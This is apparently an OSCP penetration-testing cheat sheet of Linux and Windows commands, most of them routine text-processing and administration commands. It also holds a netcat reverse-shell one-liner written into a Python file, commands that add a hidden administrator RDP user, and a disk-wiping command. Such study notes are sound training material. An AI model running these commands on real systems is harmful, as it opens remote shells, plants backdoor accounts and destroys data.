OSCP
Search…
Linux / WindowsMain commands
1
Linux main commands in OSCP
2
Find:
3
find / -name file 2>/dev/null
4
ls -ltr - Sort list by last modified. -time -reverse
5
​
6
# Remove recursively and its content. Very dangerous command!
7
rm -rf ./directory
8
List what rights the sudo user has.
9
sudo -l
10
# This will send all permissions denied outputs to dev/null.
11
find / -name file 2>/dev/null
12
Which
13
Outputs the path of the binary that you are looking for. It searches through the directories that are defined in your $PATH variable.
14
which bash
15
# Usually outputs: /bin/bash
16
​
17
Filters
18
#sort
19
sort test.txt
20
#uniq
21
sort -u test.txt
22
sort test.txt | uniq
23
cat filename | sort -u > newFileName
24
grep
25
​
26
head
27
​
28
tail
29
​
30
tr
31
​
32
sed
33
sed "1d"
34
​
35
#cut :
36
64 bytes from 192.168.0.1: icmp_req=1 ttl=255 time=4.86 ms
37
cut -d" " -f4
38
-d stands for delimiter. and -f for field.
39
​
40
tr - Translate
41
Transform all letter into capital letters
42
tr "[:lower:]" "[:upper:]" < file1 > file2
43
​
44
Remove character
45
# Remove characters
46
cat file.txt | tr -d "."
47
​
48
# Remove all dots and replace them with underscore.
49
cat file.txt | tr "." "_"
50
​
51
awk
52
awk '/search_pattern/ { action_to_take_on_matches; another_action; }' file_to_parse
53
​
54
awk '/172.16.40.10.81/' error.log
55
​
56
awk '{print}' filename
57
​
58
We can use the -F flag to add a custom delimiter. : awk -F ':' '{print $1}' test.txt
59
​
60
So if you are manipulating some text you might want to start the output with some info about the columns or something like that. To do that we can use the BEGIN-keyword.
61
awk 'BEGIN {printf "IP-address \tPort\n"} /nop/ {print $3}' test.txt | head
62
awk 'BEGIN{printf "IP-address \tPort\n"} /nop/ {print $3} END {printf "End of the file\n"}' test.txt | tail
63
​
64
# list cronjobs
65
crontab -l
66
​
67
# Edit or create new cronjobs
68
crontab -e
69
​
70
#List all devices
71
fdisk -l
72
​
73
#Systemctl
74
systemctl start ssh
75
systemctl status ssh
76
systemctl stop ssh
77
​
78
Netstat - Find outgoing and incoming connections
79
Netstat is a multiplatform tool. So it works on both mac, windows and linux.
80
$ netstat -antlp
81
​
82
netstat -anpt
83
​
84
iptables -L
85
​
86
# Remove one specific rule
87
iptables -D INPUT 2
88
​
89
​
Copied!
Iteration over a file
1
This script will iterate over a file and echo out every single line:
2
#!/bin/bash
3
​
4
for line in $(cat file.txt);do
5
echo $line
6
done
7
​
Copied!
Another Way
1
​
2
#!/bin/bash
3
​
4
while read p; do
5
echo $p
6
done <file.txt
Copied!
For Loops
1
#!/bin/bash
2
​
3
for ((i = 0; i < 10; i++)); do
4
echo $i
5
done
6
​
7
Another way to write this is by using the program seq. Seq is pretty much like range() in python. So it can be used like this:
8
​
9
#!/bin/bash
10
​
11
for x in `seq 1 100`; do
12
echo $x
13
done
Copied!
1
#!/bin/bash
2
​
3
locate 646.c | tail -n 1
4
​
5
This can be done like this:
6
#!/bin/bash
7
​
8
cat $(locate 646.c | tail -n 1)
Copied!
VI Operators
1
VI -
2
Operators
3
Operators are commands that do things. Like delete, change or copy.
4
c - change
5
ce - change until end of the word.
6
c$ - change until end of line.
7
​
8
Combining Motions and Operators
9
Now that you know some motion commands and operator commands. You can start combining them.
10
dw - delete word
11
d$ - delete to the end of the line
Copied!
Password Creation
1
openssl passwd sam
2
​
Copied!
Windows Commands
1
cmd:
2
​
3
show hidden files:
4
dir /A
5
​
6
Print out file content, like cat
7
type file.txt
8
​
9
grep files
10
findstr file.txt
11
​
12
show network information
13
netstat -an
14
​
15
Show network adapter info
16
ipconfig
17
​
18
Traceroute
19
tracert
20
​
21
List processes
22
tasklist
23
​
24
Kill a process
25
taskkill /PID 1532 /F
26
​
27
Shreds the whole machine
28
ciper /w:C:\
29
​
30
Mounting - Mapping
31
wmic logicaldisk get deviceid, volumename, description
32
​
Copied!
Scripts for fun
1
Make Request:
2
import requests
3
​
4
req = requests.get("http://site.com")
5
print req.status_code
6
print req.text
7
​
8
Read and write to files
9
​
10
file_open = open("readme.txt", "r")
11
for line in file_open:
12
print line.strip("\n")
13
if line.strip("\n") == "rad 4":
14
print "last line"
15
​
16
​
17
echo 'import os; os.system("/bin/nc ip port -e /bin/bash")' > /opt/tmp.py
18
​
Copied!
​
Add RDP User
1
Windows
2
Add RDP user
3
net user hodor Qwerty123! /add
4
net localgroup administrators hodor /add
5
net localgroup "Remote Desktop Users" hodor /add
Copied!
Enable RDP via Registry
1
Enable rdp via regsitry
2
​
Copied!
Copy link